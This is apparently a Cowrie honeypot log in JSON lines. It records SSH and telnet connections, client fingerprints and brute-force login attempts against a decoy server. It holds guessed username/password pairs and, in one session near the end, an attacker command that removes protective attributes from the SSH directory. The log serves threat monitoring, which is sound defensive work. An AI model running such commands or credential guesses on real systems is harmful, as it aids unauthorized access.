t-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:00:45.843734Z","src_ip":"185.255.91.51","session":"3a8b632827f0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:00:45.936415Z","src_ip":"212.227.235.229","session":"e1e7fb10fbe3"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:00:46.095104Z","src_ip":"212.227.235.229","session":"e1e7fb10fbe3"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:00:46.096724Z","src_ip":"212.227.235.229","session":"8d373fa9a0f9"}
{"eventid":"cowrie.login.failed","username":"test1","password":"1qaz2WSX","message":"login attempt [test1/1qaz2WSX] failed","sensor":"my-vps","timestamp":"2025-09-08T15:00:46.294909Z","src_ip":"185.255.91.51","session":"3a8b632827f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36049,"dst_ip":"1.2.3.4","dst_port":23,"session":"f629f173e8bf","protocol":"telnet","message":"New connection: 212.227.235.229:36049 (1.2.3.4:23) [session: f629f173e8bf]","sensor":"my-vps","timestamp":"2025-09-08T15:00:47.220296Z"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:00:47.395721Z","src_ip":"185.255.91.51","session":"3a8b632827f0"}
{"eventid":"cowrie.session.closed","duration":13.35927963256836,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:01:00.579489Z","src_ip":"212.227.235.229","session":"f629f173e8bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6101,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddcffcdfdbdd","protocol":"ssh","message":"New connection: 212.227.235.229:6101 (1.2.3.4:22) [session: ddcffcdfdbdd]","sensor":"my-vps","timestamp":"2025-09-08T15:01:10.120005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-08T15:01:10.276986Z","src_ip":"212.227.235.229","session":"ddcffcdfdbdd"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T15:01:10.428844Z","src_ip":"212.227.235.229","session":"ddcffcdfdbdd"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T15:01:12.039402Z","src_ip":"212.227.235.229","session":"ddcffcdfdbdd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:01:12.040875Z","src_ip":"212.227.235.229","session":"ddcffcdfdbdd"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":55860,"dst_ip":"1.2.3.4","dst_port":22,"session":"da684c427b11","protocol":"ssh","message":"New connection: 158.51.124.56:55860 (1.2.3.4:22) [session: da684c427b11]","sensor":"my-vps","timestamp":"2025-09-08T15:01:27.509485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:01:27.510105Z","src_ip":"158.51.124.56","session":"da684c427b11"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:01:27.648761Z","src_ip":"158.51.124.56","session":"da684c427b11"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"111","message":"login attempt [hammer/111] failed","sensor":"my-vps","timestamp":"2025-09-08T15:01:28.244069Z","src_ip":"158.51.124.56","session":"da684c427b11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44974,"dst_ip":"1.2.3.4","dst_port":22,"session":"bccb0946610b","protocol":"ssh","message":"New connection: 212.227.235.229:44974 (1.2.3.4:22) [session: bccb0946610b]","sensor":"my-vps","timestamp":"2025-09-08T15:01:29.035128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T15:01:29.197178Z","src_ip":"212.227.235.229","session":"bccb0946610b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T15:01:29.362986Z","src_ip":"212.227.235.229","session":"bccb0946610b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:01:29.384010Z","src_ip":"158.51.124.56","session":"da684c427b11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44984,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ead5aaad2e5","protocol":"ssh","message":"New connection: 212.227.235.229:44984 (1.2.3.4:22) [session: 0ead5aaad2e5]","sensor":"my-vps","timestamp":"2025-09-08T15:01:29.909720Z"}
{"eventid":"cowrie.client.version","version":"MGLNDD_212.227.235.229_22","message":"Remote SSH version: MGLNDD_212.227.235.229_22","sensor":"my-vps","timestamp":"2025-09-08T15:01:29.910410Z","src_ip":"212.227.235.229","session":"0ead5aaad2e5"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:01:29.912259Z","src_ip":"212.227.235.229","session":"0ead5aaad2e5"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:01:37.607397Z","src_ip":"117.156.96.5","session":"bc88060a4bb1"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:01:39.197410Z","src_ip":"212.227.235.229","session":"bccb0946610b"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":50734,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7f0bf8bc5f7","protocol":"ssh","message":"New connection: 185.255.91.51:50734 (1.2.3.4:22) [session: b7f0bf8bc5f7]","sensor":"my-vps","timestamp":"2025-09-08T15:01:54.962874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:01:54.963884Z","src_ip":"185.255.91.51","session":"b7f0bf8bc5f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:01:55.051209Z","src_ip":"185.255.91.51","session":"b7f0bf8bc5f7"}
{"eventid":"cowrie.login.failed","username":"sqldba","password":"12345","message":"login attempt [sqldba/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T15:01:55.438303Z","src_ip":"185.255.91.51","session":"b7f0bf8bc5f7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:01:56.533057Z","src_ip":"185.255.91.51","session":"b7f0bf8bc5f7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49434,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e1d3b64c299","protocol":"ssh","message":"New connection: 217.72.205.35:49434 (1.2.3.4:22) [session: 2e1d3b64c299]","sensor":"my-vps","timestamp":"2025-09-08T15:02:00.946059Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:02:00.947138Z","src_ip":"217.72.205.35","session":"2e1d3b64c299"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"895e2918084b","protocol":"ssh","message":"New connection: 212.227.125.160:6102 (1.2.3.4:22) [session: 895e2918084b]","sensor":"my-vps","timestamp":"2025-09-08T15:02:03.770074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-08T15:02:03.870818Z","src_ip":"212.227.125.160","session":"895e2918084b"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T15:02:03.970894Z","src_ip":"212.227.125.160","session":"895e2918084b"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T15:02:04.075032Z","src_ip":"212.227.125.160","session":"895e2918084b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:02:04.076565Z","src_ip":"212.227.125.160","session":"895e2918084b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50234,"dst_ip":"1.2.3.4","dst_port":22,"session":"92d46c60ea7e","protocol":"ssh","message":"New connection: 212.227.125.160:50234 (1.2.3.4:22) [session: 92d46c60ea7e]","sensor":"my-vps","timestamp":"2025-09-08T15:02:05.095330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T15:02:05.096278Z","src_ip":"212.227.125.160","session":"92d46c60ea7e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T15:02:05.247464Z","src_ip":"212.227.125.160","session":"92d46c60ea7e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50246,"dst_ip":"1.2.3.4","dst_port":22,"session":"f95bcc03b261","protocol":"ssh","message":"New connection: 212.227.125.160:50246 (1.2.3.4:22) [session: f95bcc03b261]","sensor":"my-vps","timestamp":"2025-09-08T15:02:05.549739Z"}
{"eventid":"cowrie.client.version","version":"MGLNDD_212.227.125.160_22","message":"Remote SSH version: MGLNDD_212.227.125.160_22","sensor":"my-vps","timestamp":"2025-09-08T15:02:05.550596Z","src_ip":"212.227.125.160","session":"f95bcc03b261"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:02:05.551246Z","src_ip":"212.227.125.160","session":"f95bcc03b261"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:02:15.096964Z","src_ip":"212.227.125.160","session":"92d46c60ea7e"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":53418,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdad8a5f50e0","protocol":"ssh","message":"New connection: 158.51.124.56:53418 (1.2.3.4:22) [session: fdad8a5f50e0]","sensor":"my-vps","timestamp":"2025-09-08T15:02:27.138326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:02:27.139293Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:02:27.277472Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
{"eventid":"cowrie.login.success","username":"root","password":"123asd!@#","message":"login attempt [root/123asd!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:02:27.871521Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:02:28.202357Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:02:28.203198Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:02:28.204054Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
